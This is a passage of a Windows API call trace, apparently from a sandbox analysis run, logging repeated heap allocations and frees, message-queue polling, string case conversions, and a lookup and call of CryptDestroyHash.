Flags=0x0, Size=0x10) returned 0x9ba078 [0180.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0180.855] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0180.855] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0180.855] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0180.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0180.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0180.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0180.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0180.855] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0180.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0180.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0180.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0180.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0180.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0180.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0180.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0180.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0180.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0180.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0180.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0180.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0180.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0180.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0180.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0180.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0180.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0180.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0180.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0180.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0180.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0180.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0180.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0180.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0180.857] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0180.857] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0180.857] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0180.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0180.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0180.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0180.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0180.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0180.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0180.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0180.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0180.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0180.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0180.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0180.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0180.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0180.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0180.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0180.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0180.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0180.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0180.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0180.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0180.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0180.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0180.858] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0180.858] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0180.858] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0180.858] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0180.858] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0180.858] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0180.858] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0180.858] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0180.858] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0180.858] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0180.858] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0180.858] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0180.858] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0180.858] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0180.858] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0180.858] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc168 | out: hHeap=0x8a0000) returned 1 [0180.858] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0180.858] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0180.858] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0180.858] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0180.858] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0180.858] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0180.858] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0180.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0180.858] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0180.859] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0180.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0180.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0180.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0180.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0180.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0180.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0180.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d4a0 [0180.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0180.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0180.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0180.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0180.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0180.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0180.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0180.859] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90afd8 | out: hHeap=0x8a0000) returned 1 [0180.859] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0180.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0180.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0180.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0180.859] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0180.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0180.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0180.860] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0180.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0180.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d4a0 [0180.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0180.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0180.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0180.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0180.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd840 [0180.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd8a0 [0180.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9f58 [0180.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0180.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba168 [0180.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd8d0 [0180.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd588 [0180.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd9c0 [0180.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0180.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba498 [0180.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0180.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0180.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba138 [0180.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0180.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba540 [0180.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd7e0 [0180.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0180.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd438 [0180.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd7c8 [0180.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0180.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd540 [0180.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba1b0 [0180.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0180.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0180.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0180.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0180.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0180.861] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0180.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0180.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0180.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd498 [0180.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0180.861] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0180.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0180.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0180.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0180.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0180.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0180.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0180.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0180.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0180.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0180.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0180.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0180.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0180.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0180.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0180.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0180.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0180.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0180.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0180.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0180.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0180.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0180.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0180.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0180.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0180.862] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0180.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0180.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0180.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0180.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0180.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0180.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0180.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0180.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0180.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0180.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0180.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0180.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0180.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0180.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0180.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0180.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0180.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0180.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0180.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0180.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0180.863] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0180.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x11) returned 0x90d4a0 [0180.863] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x90d4a0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0180.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0180.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0180.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0180.864] GetProcAddress (hModule=0x74f20000, lpProcName="CryptDestroyHash") returned 0x74f2df66 [0180.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0180.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0180.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0180.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0180.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0180.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0180.864] CryptDestroyHash (hHash=0x90ae18) returned 1 [0180.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0180.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0180.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0180.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0180.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0180.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0180.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0180.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0180.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0180.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0180.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0180.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0180.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0180.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0180.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0180.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0180.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0180.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0180.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0180.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0180.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0180.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0180.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 